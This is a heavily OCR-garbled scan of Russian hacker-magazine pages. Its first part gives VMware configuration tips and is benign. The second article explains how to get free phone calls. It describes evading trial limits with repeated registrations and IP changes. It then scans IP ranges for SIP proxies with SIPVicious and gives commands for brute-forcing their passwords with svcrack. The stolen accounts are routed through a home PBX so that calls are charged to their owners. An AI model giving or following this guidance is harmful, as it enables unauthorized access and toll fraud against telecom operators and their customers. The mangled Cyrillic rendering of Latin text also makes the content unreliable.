машины, которую можешь запустить на ѴМѵѵаге ѴѴогкзШбоп, Зегѵег и других 
продуктах этой компании. 

Р 2 Ѵ-решение отѴМѵѵаге — это, безусловно, оченьхороший, удобный и 
простой в использовании продукт, но, возможно, тебе захочется попробо- 
вать и другие подобные утилиты: Деозітеапп [ ѵѵѵѵѵѵ.ІеозШеапп.сопп І. РІаіеЗріп 
[ ѵѵѵѵѵѵ.рІаІеБріп.сопп ). ѴІГІ110220 [ ѵѵѵѵѵѵ.БѵѵБОІІ.сот/еп/ргосІисіБ/ѵігШогго І. 
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Процесс миграции реальной ОС в виртуальную: осталось 68% 



Мониторинг многочисленных серверов с помощью ѴігІиаІЭегѵег 



работы можем поменять через ОІІГвые окошки. Это наиболее 
простой и удобный, но сильно ограниченный вариант управ- 
ления виртуальной машиной. На самом деле все параметры 
хранятся втекстовом конфиг-файле, а мастер лишь помогает 
его заполнять. И если через конфигуратор мы можем изменить 
лишь несколько основных опций, то, поправив конфи г вруч- 
ную, мы можем изменить все что угодно! Конфиг-файлы имеют 
расширение ѵтх и выглядят примерно следующим образом: 



Подробнее обо всех остальных параметрах виртуальной 
системы можно прочитать в мануалах (ищи ссылки в боковых 
выносах). Однако можно пойти другим путем и воспользо- 
ваться альтернативными конфигураторами. Существуют 
каконлайновые (ѴМВиіШег. ШрУ/сІсдгепсІеІіЬеѵѵаМеігоп. 
пеі/ѵтЬиіІбег ).таки оффлайновыеутилиты (ѴМВиіІбег, 
ЬШрУ/реІгизка.зШгбоск.пеі/ЭоІТѵѵа ге/ѴМѵѵа ге.ЫтІ : 
ЕазѵѴМХ ѵѵѵѵѵѵ.еазѵѵтх.сот ). 




сопіід . ѵегзіоп = "8" 
ѵігЬиаІШ. ѵегзіоп = "б" 
диезЬОЗ = "міпхррго" 



Это самый простой конфиг. Первые две строчки указывают на 
то, что работа будет осуществляться под управлением ѴМѵѵаге 
6.x, последняя строчка обозначает гостевую операционную 
систему (ѴѴІп б оѵѵзХР Ргоіюззіопаі). Поскольку мы не задавали 
никаких параметров по аппаратной части виртуальной ма- 
шины, они будут выбраны поумолчанию: это будет однопро- 
цессорная система с32 Мб оперативной памяти. Предлагаю 
добавить в виртуальный компьютер сетевую карту и связать ее 
с реальным адаптером в компьютере. 



ТКІСКЙЗ. ЗАПУСКАЕМ ЫѴЕСО НАѴМѴѴАКЕ 

За примером бессилия стандартного конфигуратора вирту- 
альных машин далеко ходить не надо. Если ты попытаешься 
запустить на виртуальной машине какой-нибудь ЦіѵеСО- 
дистрибутив (к счастью, на нашем прошлом диске их было 
сразу 4), то серьезно обломаешься, потому как задать опцию 
«Загрузиться с диска» через конфигуратор нельзя. Вот как 
раз втаком случае мы и воспользуемся следующим 
ѴМХ-файлом: 



ѵѵѵѵѵѵ.Цід.ги/ 
сри/200601 08/ргіпЕ 
Ыті — производи- 
тельность серверов 
АМО и Іпіеі в усло- 
виях виртуализации 
ѴМѵѵаге ЕЭХЭегѵег. 
ѵѵѵѵѵѵ.запЬаггоѵѵ.сопп 
— сайте мануалами 
по ѵтх файлам. 



еЫіегпеЬО . ргезепЬ= "Ьгие" 
еЫіегпеЬО . зЬагЬСоппесЬесІ = "Ігие" 
еЫіегпеЬО . ѵігЬиаІБеѵ = "еІООО" 
еЬкегпеЬО . соппесЬіопТуре = "Ьгісідесі" 



Первая и вторая строка указывают, что сетевой адаптер включен 
и запускается вместе с системой автоматически. Как видишь, 
параметры задаются для сетевого адаптера еібегпеШ, в системе 
их может быть несколько. С помощью параметра ѵігіиаЮеѵ мы 
выбрали чипсет Іпіеі Е1000, а посредством соппесбопТуреука- 
зали на то, что сетевая карта должна работать в режиме Ьгібде 
(работа через физическую сетевушку в системе). 



сопіід . ѵегзіоп = "8" 

ѵігЬиаІНШ. ѵегзіоп = "4" 

зсзіО . ргезепЬ = "ТКІІЕ" 

тешзізе = "256" 

ісіеі : 0 . ргезепЬ = "ТКІІЕ" 

ісіеі : 0 . ііІеЫате = " Ііѵессі. ізо" 

ісіеі : 0 . сІеѵісеТуре = " ссігош-ішаде" 

ТІорруО . ргезепЬ = "ЕАЬЗЕ" 

еЫтегпеЬО . ргезепЬ = "ТКІІЕ" 

изЬ.ргезепЬ = "ТКІІЕ" 

зоипсКргезепЦ = "ТКІІЕ" 

зоипсі. ѵігЬиаІБеѵ = "ез1371" 

сіізрІауЕате = " ЬіѵеСБ" 

диезЬОЗ = " оШгегІіпих" 

пѵгат = " оЬЪ.ег1іпих . пѵгат" 

члгогкіпдБіг = " . " 




> сіѵсі 

Специально для 
тебя на диске мы 
выложили дистри- 
бутивы популярных 
продуктов 
виртуализации. 



«ЕСЛИ ТЫ ПОПЫТАЕШЬСЯ ЗАПУСТИТЬ НА ВИРТУАЛЬНОЙ МАШИНЕ КАКОИ-НИБУДЬ 
ЫѴЕСО-ДИСТРИБУТИВ, ТО СЕРЬЕЗНО ОБЛОМАЕШЬСЯ, ПОТОМУ КАК ЗАДАТЬ ОПЦИЮ 
«ЗАГРУЗИТЬСЯ С ДИСКА» ЧЕРЕЗ КОНФИГУРАТОР НЕЛЬЗЯ» 
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ѴМѵѵаге ѴѴогкзіаІіоп: с этой штукой можнотворить чудеса 



Нужнотолько поправить параметр ісіеі ЮііІеЫате, где вместо ІіѵессІ.ізо 
указать имя 150-файла с дистрибутивом. Само собой, 150’шку необходи- 
мо положить в каталоге рядом с конфигом. Все, теперь можно запускать 
виртуальную машину, дважды кликнув по ѴМХ-файлу, либо через меню 
«ѴМѵѵаге ѴѴогквіаііоп/РІауег: Рііе Ореп». 

Для лучшей производительности и совместимости рекомендую поиграть- 
ся с параметром диезЮЗ, изменив его значение с оіЬегІіпих (обычный 
І_іпих-дистрибутив) в зависимости от платформы, на которой построен 
ЫѵеСО: 

• ѴѴІпбоѵѵ5 5егѵег2003 Зіапбагб Ебіііоп — «ѵѵіппеізіапбагб» 

• ѴѴІпбоѵѵзХР РгоіюзБІопаІ — «ѵѵіпхррго» 

• Реб Наі Ыпих (депегіс) — «геббаі» 

• 5и5Е Ыпих (депегіс) — «зизе» 

• Ыеіѵѵаге 6 — «пеЬ/ѵагеб» 

• Зоіагіз 1 0 (ехрегітепіаі) — «зоіа гізі О» 

• РгееВЗй (депегіс) — «^геебзб» 



ТРЮК #4. НЕ ѴМѴѴАРЕ ЕДИНОМ! 

Одно дело — поднять под виртуалкой одну систему. Даже две гостевые ОС 
— это еще куда ни шло, хотя производительности уже явно не хватает. Но 
если речь идет о десятке виртуальных машин или, что скорее, серверов, 
объединенных в единую сеть со сложной инфраструктурой, то никакие 
ѴМѵѵаге ѴѴогкзіаііоп и другие привычные нам продукты не катят. Слишком 
сложная задача, для которой у них, честно говоря, кишка тонка, чего не 
скажешь о серьезном продукте ѴМѵѵаге ЕЗХЗегѵег. 

Это тоже система виртуализации, но работает она совсем по-другому. 
Главное отличие отдругих систем — установка на компьютер вместо ОС 
(используется специализированное ядро ѴМКегпеІ и модифицированная 
версия Ыпих в качестве консольной ОС), что позволяетзначительно по- 
высить быстродействие. Поэтому процесс установки у нее сильно отлича- 
ется оттаковогоу обычного приложения. Впрочем, ничего сложного в ней 
нет: она выполняется с помощью специального графического интерфей- 
са, подобного тем, что поставляются с современными дистрибутивами 
пингвина (что неудивительно, поскольку Е5Х построен на базе ПебНаІ:). 

На хорошем оборудовании вся процедура едва ли займетбольше часа. 



^ с 



4 г & и 



■ 



- гг*..* - *ѵи а 

я ■ • • ~ - Чіі . 

Ь *И ■§— н-К-тФ ■ *Н 
■ I ЕІР.Г^Чі - -ЛЖІ 

■« А ш гіа.лЬ 
'■ *-» - 






Н т-пшА ■ІІІЧ ■ «и I Г" I ■ 

.а :г — «• — г іі — : ■ ■ 

И гиі “ - Чниші' 

. ■ ■ Ѵ.у.іі№.и ^ 

■ ■ ■■■■«■ і і ■ 



л ѴМХ-файл вручну 



Теперь можно создавать виртуальные машины, налаживать инфра- 
структуру... Стоп. Какую инфраструктуру? Сейчас объясню. Ключевыми 
понятиями виртуальной инфраструктуры являются: физический адаптер 
(N10, виртуальный адаптер (ѵЫІС), виртуальный коммутатор (ѵЗѵѵНюН) и 
виртуальная сеть (ѵЕАЫ). Из всего этого можно слепить сеть любой слож- 
ности. Далее ее работа тестируется в полевыхусловиях, проверяется 
состоятельность и оценивается отказоустойчивость. ѴМѵѵаге ЕЗХЗегѵег 
позволяет создавать для виртуальной машины до четырех виртуальных 
сетевых адаптеров, каждый из которых может быть привязан к виртуаль- 
ной сети, создаваемой в свою очередь на виртуальных коммутаторах. 
Если виртуальный коммутатор подключен кфизическому сетевому 
адаптеру, то виртуальные машины через него смогут видеть внешнюю по 
отношению к ЕЗХсеть. 

Для управления Е5Х-сервером и создания первых виртуальных машин 
используется ѴМѵѵаге Іпітазітисіюге Сііепі:, который можно скачать по 
такому адресу: ЫТр5://<имя вашего Е5Х>. Еще одно средствоуправления 
Е5Х-серверами, создания и настройки виртуальных машин и инфра- 
структуры называется Ѵігіиаі Сепіег. Подробно рассказывать об установ- 
ке и настройке чего-либо мы сегодня не будем, для этого потребовалась 
бы отдельная статья. Тем более что попробовать Е5Х можно и без нашей 
помощи. Нохочу обратитьтвое внимание нато, что Е5Х — это продукт 
профессиональный, который сейчас быстрыми темпами набирает попу- 
лярность. За счет виртуализации на одном физическом сервере можно 
поднять несколько виртуальных, у каждого из которых будет свое предна- 
значение. Продуманныеалгоритмы виртуализации и мощное многопро- 
цессорноежелезо позволяют им нетерять в производительности, и при 
этом, вместо кучи железа, которое нужно обслуживать, будет стоять всего 
один физический сервер. Чуешь выгоду? 



ТШСК #5. 1-ІѴЕ ѴМѴѴАКЕ: ЛЮБАЯ ОС ДАЖЕ НА ЧУЖОМ 
КОМПЬЮТЕРЕ 

То, что позволяют системы виртуализации, — это уже очень здорово. Но 
виртуализацию можно использовать не только для проектирования и 
тестирования локальной сети, изучения новых ОС или отладки программ. 
Ее можнозаюзать, например, длятого, чтобы работать в привычном 



«ИНТЕРЕСНО, ЧТО СВОИМ ПРОГРАММИСТАМ КОМПАНИЯ ѴМѴѴАРЕ ПЛАТИТ $130-150 
ТЫСЯЧ В ГОД, ПЛЮС МНОГОЧИСЛЕННЫЕ БОНУСЫ. СТОЛЬ ВЫСОКИЕ КОМПЕНСАЦИИ 
ПРОГРАММИСТАМ ЕСТЬ ЕЩЕ ТОЛ ЬКО В ООООЬЕ» 



► 030 
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Удобный инструмент для создания ѴМХ-конфигов 



ТРІСК #6. ДОСТУП К ВИРТУАЛЬНОМУ ДИСКУ 

Мало кто знает, что неиспользуемый виртуальный диск можно 
при монтировать к системе и легко обращаться к нему, без проблем 
копируя оттуда и туда нужные файлы. Для этого в состав продуктов 
ѴМѵѵаге входит специальная утилита — РівкМоипІ. Эта очень не- 
большая программа, которая запускается через консоль по команде 
ѵтѵѵаге-тоипі и работает аналогично команде вибві в ѴѴІпбоѵѵз. 
Единственное условие в том, чтобы виртуальный диск в этот момент 
не использовался виртуальной машиной. Тогда подключить его 
возможно одной командой: 
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окружении на совершенно чужом компьютере. Там, где уже миллион лет 
не переставлялась Винда и работать на ней невозможно, где стоит какой- 
нибудь замученный Линукс или, например, вообще нет ОС. 

Ты можешь за писать ѴМѵѵаге и файлы виртуальной машины на ЫѵеСР 
или даже на флешку, брать ее собой и везде, где бы ты ни был, работать 
в привычном окружении. Здорово? Еще бы, нотолько здесь, как и везде, 
есть свои тонкости и нюансы. Многое, к счастью, уже продумано за нас, 
поэтому на просторах Сети зарыт один замечательный инструмент, кото- 
рый называется Моа [ ѵѵѵѵѵѵ. за пЬаггоѵѵ. со гл ). Утилита совсем небольшая, 
слегка мудреная, и, наверное, поэтому она до сих пор не имеет широкого 
распространения, несмотря нато что предоставляет просто поразитель- 
ные возможности. По сути, это всего лишь плагин к известной программе 
Вагів РеЬи іісіег [ ѵѵѵѵѵѵ.пи2.пи/реЬиіІсІег 1. позволяющей создавать ЫѵеСО 
или загрузочную флешку с ѴѴІпбоѵѵз на борту (напомню, что в материале 
«Дайте две» мы рассказывали тебе о том, как создать загрузочную флеш- 
ку одновременно с Виндой и никсами). 

Размесить ѴМѵѵаге и заставить ее работать в ЫѵеСО-окружении очень 
сложно, поэтому без Моа тут не обойтись. Нам потребуется дистрибутив 
ѴѴІпбоѵѵз 2003 с интегрированным ЗегѵісеРаск 1 и ѴМѵѵаге ѴѴогквІаІіоп 
версии 5.5.*. Вот краткая инструкция: 

1 . Скачай свежую версию РЕ Виіісіег. 

2. Распакуй файлы дистрибутива на N105. 

3. Переименуй каталоге оригинальными плагинами в ріидіп-огд. 

4. Сделай то же самое с каталогом драйверов, новое имя — бгіѵегз-огд. 

5. Распакуй архив с Моа — тоа21 .Ыр — в директорию РЕ Виіісіег. 

6. Скопируй файлы ѴМѵѵаге в папку рІидіп\ѵѵз552 — они будут на нашем 
0Ѵ0. 

7. Запускай РЕ Виіісіег. Когда появится окошко, предлагающее искать 
файлы с дистрибутивом Винды, отказывайся. А в следующем окне в поле 
Зоигсе укажи их вручную. 

8. Создай 150 изапиши ее на диск. 



^ рс_гопе 
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'становщик Е5Х5егѵег похож нате, что используются в современных 
Ыпих-системах 



ѵшѵ^аге-шоипС Ь: "С:\Му ѴігСиаІ МасМпез\м2 003зСс1. 
ѵтсік " 



Программу можно запускать с различными ключами, но чтобы каждый 
раз незалезать в консольдлятого, чтобы примонтировать/размонтиро- 
вать нужный диск, я рекомендую тебе специально написанную графи- 
ческую оболочку — ѴМѵѵаге РівкМоипІ 6111 [ ЫірУ/реІгизка.зІагсІоск. 
пеі/Зокѵѵаге/ѴМѵѵаге.ІіІтІ ) . ил 



а что отвечают файлы виртуальной машины 



При создании любой виртуальной машины создается отнюдь не один 
файл, а несколько. Расскажулишьоб основныхтипах файлов, используе- 
мых гостевыми ОС. 

•.ѵтх — главный конфигурационный файл; 

•.ѵтсік — описание параметров виртуального диска; 

•.пѵгат — постоянная память РАМ: содержиттекущие настройки вирту- 
альной ВІ05; 

ѵѵтет — файл подкачки виртуальной машины; 

•.ѵтвп — содержиттекущие данные зпарзЬоЕа, пѵгат и копию 
ѴМХ-файла; 

•.ѵтзсі — параметры текущего зпарвИоІ'а; 

•.ѵт55 — содержит РАМ приостановленной (зизрепбеб) виртуальной 
машины. 



Сеть под ѴМѵѵаге 



Во время создания виртуальной машины мастер запрашивает параметры 
для виртуального сетевого адаптера. Всего 4 варианта, вотони вместе с 
поясняющими описаниями: 

Цве ЬгісІдесІ пеіѵѵогкіпд — виртуальная машина имеет полный доступ в 
локальную сеть, к которой подключен основной компьютер. При этому 
нее есть собственный ІР-адрес, поэтому она работает наравне со всеми 
остальными компьютерами в сети. 

Цве І\ІАТ — гостевая ось в этом случае спрятана за ЫАТ-сервисом, который 
организован на основной машине. Она может обращаться клюбомуузлу 
локальной сети, однако удаленный узел не может инициировать подклю- 
чение кней (таккакона не имеет собственного ІР). 

Цве Ьозі-опіѵ пеіѵѵогкіпд — в этом случае будет использоваться виртуаль- 
ная сеть с основным компьютером. Возможности доступа во внешнюю 
локальную сеть отсутствуют. 

Ро поі иве пеіѵѵогк — сеть использоваться не будет. 



► озі 
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НОВЫЕ СПОСОБЫ БЕСПЛАТНО 



ЗВОНИТЬ ПО Іі/І ЕЖ ГО РОДУ 

КРУГОМ ОДНИ РАСХОДЫ! вот взять 
ХОТЯ БЫ ТЕЛЕФОННЫЕ РАЗГОВОРЫ. КА- 
ЖЕТСЯ МЕЛОЧЬ, НО ОБХОДИТСЯ НЕДЕ- 
ШЕВО. А ЧАСТЕНЬКО ВООБЩЕ ВЛЕТАЕТ 
В КОПЕЕЧКУ, ОСОБЕННО ЕСЛИ ВЕЧЕРОМ 
ВЗБРЕДЕТ В ГОЛОВУ ПОЗВОНИТЬ ДАВ- 
НЕЙ ПОДРУЖКЕ С КАМЧАТКИ. ИЛИ, ЧТО 
ЕЩЕХУЖЕ, ИЗ США- ВОТ ВЕДЬ КУДА ЕЕ 



СТЕПАН «ЗТЕР» 

/ ЗТЕР@САМЕІ_АЫ0„КІІ 



«ЗКѴ02ІЧ0Ѵ» КОМАРОВ 

КОМАНОѴ@ІТОЁГЕГіСЕ.іиі / 



м тгород 

ИНЕЕ! 



ЗАНЕСЛО! КОНЕЧНО, 5КУРЕ - ЭТО ВЫХОД 
ИЗ ПОЛОЖЕНИЯ, НО БЫСТРЫЙ ИНЕТ И 
КОМПЬЮТЕР ЕСТЬ ПОД РУКОЙ ДАЛЕКО 
НЕ ВСЕГДА. А РАЗГОВАРИВАТЬ БЕСПЛАТ- 
НО ХОЧЕТСЯ И ЖЕЛАТЕЛЬНО ПООБЫЧ- 
НОМУТЕЛЕФОНУ. ПОТОМУ-ТО МЫ И ЗА- 
ДАЛИСЬ БОЛЬШОЙ И ЗНАЧИМОЙ ЦЕЛЬЮ 
- НАУЧИТЬСЯ ЗВОНИТЬ БЕСПЛАТНО. 

И ВЕДЬ НАУЧИЛИСЬ ЖЕ! 

давние времена для того, чтобы позвонить куда-либо на 
халяву, приходилось обманывать АТС. Это было непросто, 
и без знания специальной системы сигнализации №7 
(Зідпаііпд Эузіет 7, 557) рыпаться было бесполезно. Осво- 
ив огромную кипу документации, можно было по-настоящему гордиться 
собой и считать себя авторитетным фрикером. Существовал также 
вариант применения навыков социальной инженерии при обще ниис 
оператором, но и это не гарантировало результатов. Тем более постоян- 
ных. Сейчасже все изменилось и подходы стали совершенно другими. 



Впрочем, и связьуже нета. Повсюду цифровые АТС, в метро — реклама 
многочисленных альтернативных операторов, предлагающих звонки 
по межгороду и за рубеж за копейки. А по сети и вовсе — звони в любые 
точки мира через тотже 5куре. А все благодаря чему? Все благодаря 
технологии ѴоІР, с помощью которой, как выяснилось, можно звонить 
не только дешево, но и вообще бесплатно! 

ВОТОНО, РЕШЕНИЕ 

Признаться, на возможность бесплатно звонить по межгороду я на- 
ткнулся совершенно случайно. На глаза попалась ссылка на програм- 
му, якобы позволяющую совершать звонки в другие города и страны 
абсолютно 41тее. И если бы не пара восторженных комментариев от 
авторизированных пользователей, то я тутже бы определил для себя 
эту программу как очередное средство выманивания многочислен- 
ных паролей пользователей или тупой маркетинговый ход. Но нет. 
Оказалось, что по ссылке ѵѵѵѵѵѵ.роіѵу.сот действительно можно скачать 
некое приложение, внешний в ид которого говорил о том, что позвонить 
с его помощью все-таки реально. Но куда, пока было неясно. Никакого 
намека на принадлежность к России не было, поэтому в возможность 
звонков на российские городскиетелефоны я верил струдом. Но все- 
таки решил попробовать! 

Каки влюбой сети, для работы требовалось завести себеаккаунт. 

В случае с РоіѵУ все, что нужно, — это желаемое имя пользователя, 
пароль и рабочий етаіі. После этого можно пользоваться. В нижней 
части интерфейса естьтекстовое поле; оно никак не обозначено, но по 
иконкам с зеленой и красной трубкой телефона несложно догадаться, 
что предназначено оно для ввода номера. Итак, попробуем. 




► 032 
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Програ мма зѵтар, входящая в комплекс ЗІРѴІсіоив 
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Ищем 5ІР- прокси через 5 МАР 



Я ввожу свой домашний телефон в международном форма- 
те (+74842123456) и звоню. 

Каковоже было мое удивление, когда стоящий рядом 
телефон действительно запищал. Я снял трубку, соеди- 
нение было установлено практически моментально. Тут 
же начались эксперименты со звонками в Москву, Питер, 
Рязанскую область — куда бы я не звонил, соединение 
устанавливалось мгновенно. Связь на самом высоком 
уровне, с небольшими и вполне простительными задерж- 
ками. К сожалению, радость длилась недолго, и очень 
скоро сервис сообщил о том, что лимит бесплатных минут 
исчерпан. Далее — внимание: я просто выбрал вменю 
«Файл -> Войти как новый пользователь» и получил новую 
порцию бесплатных звонков. Вот это сервис :]. 

НО РЕШЕНИЕ СОГРАНИЧЕНИЯМИ 

Без ложки дегтя, конечно, не обошлось. Самый главный не- 
достаток этого сервиса — отсутствие возможности звонить 
на мобильныетелефоны (забегая вперед, скажу, что для 
этого пришлось искать другой способ). Но зато широта все- 
возможных направлений бесплатных звонков впечатляет. 
Хотя и тут есть свои тонкости. Сразу после регистрации 
оператор выделяет небольшую сумму для пробного звонка 
(0,151 евро). Звонки с пометкой Ргее, то есть бесплатные, 
на самом деле стоят денег (пускай и ничтожных). В зависи- 
мости от выбранного направления, бесплатных разговоров 
с одного аккаунта может хватить на 5-30 минут. Повторная 
регистрация решает проблему, но лишь отчасти, потому 
как количество учетных записей с одного ІР ограничена и 
каждый раз придется нетолько регистрироваться, но еще и 
периодически заботиться о смене своего сетевого адреса. 
Выход из этой ситуации — положить на счет 1 0 евро. После 
этогоутебя втечениетрех месяцев будетЗОО бесплатных 
минут в неделю, а сами деньги ты можешь потратить на 
мегадешевые звонки (гораздо выгоднее именитого Зкуре), 
к примеру, на мобилы. Впрочем, на этом тонкости не 
заканчиваются. 

НЕБОЛЬШОЕ РАССЛЕДОВАНИЕ 

В ходе небольшого расследования выяснилось, что по- 
добных РоіѵУ-сервисов как минимум с десяток. Они имеют 
разные названия и разные клиенты, но все какодин являются 
реселлерами (тоестьобычными перепродавцами) крупнойте- 
лекоммуникационной компании Веіатах [ ѵѵѵѵѵѵ.ЬеІатах.сот ]. 
Но нам это даже на руку! 

У каждого из реселлеров есть свой список бесплатных на- 
правлений, зависящий от ориентированности их клиентов. 
Поэтому если с одного сервиса звонки в туже Турцию плат- 
ные (как, например, в случае с описанным РоіѵУ),тоестьвсе 
шансы найти оператора, который предоставляет их бесплатно. 
Кстати, та кой действительно есть — \ллл/ѵѵ.12ѵоір.сопп . 



Остается только вопрос: как найти нужного? Для этого есть 
специальный сайт, на котором автоматически собираются 
и группируются тарифы всех реселлеров. Держи его в сек- 
рете: Міщ//Ьаскі^ Для справки: сразу 

16 сервисов предоставляютбесплатные звонки в Россию. 

И еще один момент. Каждый из Веіатах-сервисов предо- 
ставляетзамечательную услугу — Оігесі Са II, позволяющую 
обоим собеседникам обходиться одним только телефо- 
ном безо всякой гарнитуры. Итак, смысл в следующем. 

В одно из предложенныхтекстовых полей ты вводишь 
свой телефон, в другое — телефон своего собеседника, 
тутже нажимая кнопку «Соединить». Не пройдет и пары 
секунд, как раздастся телефонный звонок. Один на связи! 
Теперь сервис позвонит твоему собеседнику. Как только 
тот возьметтрубку, между вами будет установлена прямая 
связь. Воттак просто и эффектно. Причем состояние («идет 
звонок», «занято», «абонент не отвечает») ты в реальном 
времени можешь посмотреть на сайте (если, конечно, для 
звонка используешь именно его). 

А КАКЖЕ МОБИЛЫ? 

Неприятное ограничение, связанное с отсутствием воз- 
можности позвонить на мобильныетелефоны, заставило 
нас продолжить эксперименты. Новая задумка появилась 
довольно скоро. А почему бы самим не устроить бесплатное 
направлениетуда, куда нужно? Для того чтобы лучше по- 
нять суть идеи, давай разберемся, каким образом устроены 
популярные ѴоІР-сервисы. 

Огромную роль во всей индустрии играет замечательная 
технология 5ІР (Зевзіоп Іпіііаііоп Ргоіосоі), отвечающая за 
передачу голоса, трансляцию видео и отправку факсимиль- 
ных сообщений. Это не единственный протокол, исполь- 
зуемый для передачи данных в цифровом виде, однако 
именно он получил наибольшее распространение за счет 
своей открытости. И именно его используетабсолютное 
большинство приложений, как клиентских для осуществле- 
ния звонков пользователями, так и серверных, которые эти 
звонки обрабатывают. 

Общая схема работы следующая. Есть клиенты, которые с 
помощью специальных ѴоІР-телефонов (смотри скриншот) 
либо чисто программных средств (тотже Экуре или 6 І 2 то) 
соединяются со специальным координирующим звеном 
— учрежденческой АТС (в английских терминах — ВРХ, 
Ргіѵаіе Вгапсб еХсбапде). ВРХуправляетзвонками между 
своими пользователями или, в случае необходимости, 
перенаправляет их на обычные телефоны (сотовые или го- 
родские), то есть в так называемую телефонную сеть обще- 
го пользования (Р5ТЫ, РиЫіс Зѵѵіісбеб Теіербопе Ыеіѵѵогк). 
Перенаправление осуществляется за счет специальных 
шлюзов — 5 ІР- прокси. Поэтому общая идея заключалась в 
том, чтобы найти 5ІР-прокси, просканировав диапазон 




> СІѴСІ 

На нашем ОѴй ты 
найдешь весь софт, 
упомянутый в статье, 
а также многочис- 
ленные мануалы по 
технологии ѴоІР. 




> Ипкз 

ѵѵѵѵѵѵТадв.огдМсв/ 
гіс326ШшТ- РРС 
3261 : протокол 5ІР. 
ѵѵѵѵѵѵ.ІгіхЬох.огд 
— специальный *піх- 
дистрибутив для 
организации РВХ. 







ѵ » / 

> ІП^О 

Часто возникает 
вопрос: какой 
объем трафика будет 
кушать ѴоІР? Здесь 
многое зависит от 
кодека. В случае 
д723 примерно 
1,5 Кб/с, д711 - 
~9 Кб/с в каждую 
сторону, д729А — 

~3 Кб/с. Но необхо- 
димо учитывать, что, 
когда ты молчишь, от 
тебя к собеседнику 
трафик не идет. 
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Мака л гли М*І <*т 

Ѵвів рІинкіішікЬег: 

И4М25«6?43 | 

0Ц.*Цц:цНЦ>1|“П* (Иіі|Ію<; 

МИФИТО | ГЁДІ 

Ечі*і.рйіп ріцПіі гицтрйш ИГ, №■* ііпігплі йплі 
к-гтжі, Іи г №*У «»: ОВДЗД ІІЯЙ^Э 
Рі« ФШГ-МФ ШМй -рп# фпі|г*і*і 0 ■‘«гЩпфПп+.і 
Іп 4*Аіп іЬо-« т^ФлЛ и ■ 

*4ыгй НЫ*ѴЩІМЫЫ . 



С помощьюуслуги ОігесЮаЦ можно бесплатно позвонить по 
межгороду, просто указав на сайте два телефона (абонента и 
свой собственный), — система сама вас соединит 




ІР-адресов, получить к ним доступ (в случае если они закрытые), а 
потом использовать полученные аккаунты в настроенном нами ѴоІР- 
софте. Вот тебе и бесплатные звонки. 

ИЩЕМ 5ІР-ПР0КСИ 

Реализовать эту затею можно при помощи ЗІРѴІсіоиз ( ШрУ/сосІе.доодІе. 
сот/р/зірѵісіоиз ). Это известный наборутилит, написанных на РуіЬоп, 
который идеально подходит для 5ІР-хакинга. Состоитон из нескольких 
приложений: 

• зѵппар — сканер 5ІР-устройств в сетях; 

• зѵѵѵаг — сканер активных подключений на РВХ; 

• зѵсгаск — пасс-крякер для 5ІР РВХ. 

Зачастую на ѴоІР-устройствах используются распространенные пароли, 
поэтому подобрать их не составляеттруда. Этим когда-то воспользо- 
вался ѴоІР-хакер Робер Муре (Моогег). Им былоукрадено кредитов на 
1 0 миллионов минут разговора общей стоимостью 1 миллион долларов. 
Неплохо. Однако за этим последовал егоарестФБР, но это уже другая 
история :), а факт остается фактом. 

Итак, приступим. Качаем пакете сайта сосіе.доодіе.сот/р/зірѵісіоиз и с 
помощью интерпретатора РуіЬоп запускаем сканер: 

руСйоп зѵппар. ру 10.1.1.1/24 -р (порт) -о зсап.сзѵ 

Через некоторое время будет готов отчето сканировании зсап.сзѵ, в кото- 
ром мыувидитьсписок найденныхустройств для подключения. Втехже 
целях можно использовать никсовую утилиту згпар, в этом случае команда 
для начала сканирования выглядит при мерно так: 

зтар -0 -С 10. 1.1. /24 

Двигаемся дальше. Среди найденных шлюзов большая часть, наверняка, 
будет запаролена, поэтому натравляем на нихбрутфорс (файл с паролями 
для перебора ты найдешь на нашем диске): 

руСйоп зѵѵсгаск.ру хост -р(порт) -и (предположительное 
имя пользователя) -сі (файл с паролями для перебора) 

ЧТО ДЕЛАТЬ ДАЛЬШЕ 

Итак, у нас есть серверы, параметры учетной записи. Что делать дальше? 
Нужно понять, что с помощью этих данных можно направитьзвонки в 
чужие сети, имеющие выход на РЭТЫ-гейт, а значитзвонить фактически 
на любые номера! Поэтому сразу после того, какмы обзавелисьЭІР-акка- 
унтами, мы подняли свою собственную РВХ, то есть небольшую АТС. Тут мы 
могли поступитьдвумя способами: либо купить дорогостоящее физиче- 
ское оборудование, что для насявно не вариант, либоже использовать 
программные реализации. Самым авторитетным инструментом, конечно, 
является никсовый Азіегіх ( ѵѵѵѵѵѵ.азіегізк.огд ). но мучиться с ним не 



хотелось. В наших целях был вполне пригоден его виндовый порт 
( ѵѵѵѵѵѵ.а5іегізкѵѵіп32.сот ) или решение от компании Вгекеке 
( ѵѵѵѵѵѵ.Ьгекеке.сопп ). Последнее поставляется в практически настроенном 
виде, и все, что от настребуется, — это создать нового пользователя и 
указать насканенный ЭІР-даіе (Ѵоір ргоѵібег), обозначив его ІР-адрес (или 




12ѴОІР 



Іоѵѵгаіеѵоір.сот 



Сервисы, 
предоставля- 
ющие бесплат- 
ные междуго- 
родние звонки 
по России 



іпіегпеісаііз.сот г 



)изІѵоір.сот 



Програ 



ѵоірсіізсоипСсот 



зрагѵоір.сіе 



ѵоірзІипСсот 



ѵѵеЬсаиаігесІ.сот 



попоЬ.пе* 
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Регистрируем новый аккаунт в РоіѵУ 



также параметры созданного пользователя. Готово! 




ѵоірсЬеар.со.ик 



роіѵу.сот 

зтзсМзсоипЕсот 



БГКЖ1 * 

в» 



Типичный ѴоІР-телефон удобен, но вместо него всегда можно использо- 
вать программное средство 



НЕ РАБОТАЕТ! 

Казалось бы: есть шлюз на Р5ТЫ, есть своя РВХ, есть софтовый теле- 
фон. Звони не хочу. Но итутесть нюансы. Во-первых, номер набирать 
нужно обязательно в международном формате, об этом подробно 
написано во врезке. Но это ерунда по сравнению со вторым нюансом. 
Дело в том, что заранее определить, в какие направления разрешает 
переадресацию звонков взломанный 51 Р-п рокси, мы не можем. Воз- 
можно, только в Штаты. Или только в Европу. Вполне реально, что во все 
направления или вообще никуда. Определить это можно фактически 
только методом тыка. Хотя посмотреть географию сервера (восполь- 
зовавшись сервисом ѵѵѵѵѵѵ.ір2[оса1:іоп.сопп 1 тоже не помешает. Если 
выяснится, что 51 Р-п рокси находится в Германии, то есть все основания 
полагать, что туда-то звонки будут перенаправлены точно. С остальны- 
ми странами все аналогично! 

ПОЕХАЛИ! 

Запускаем Х-Ыіе. Идет соединение с нашей ВРХ. Все О К. Впрочем, по- 
другому и быть не может. Теперь вводим московский мобильный номер 
и, практически не дыша, жмем на клавишу соединения... А-а -а! Телефон 
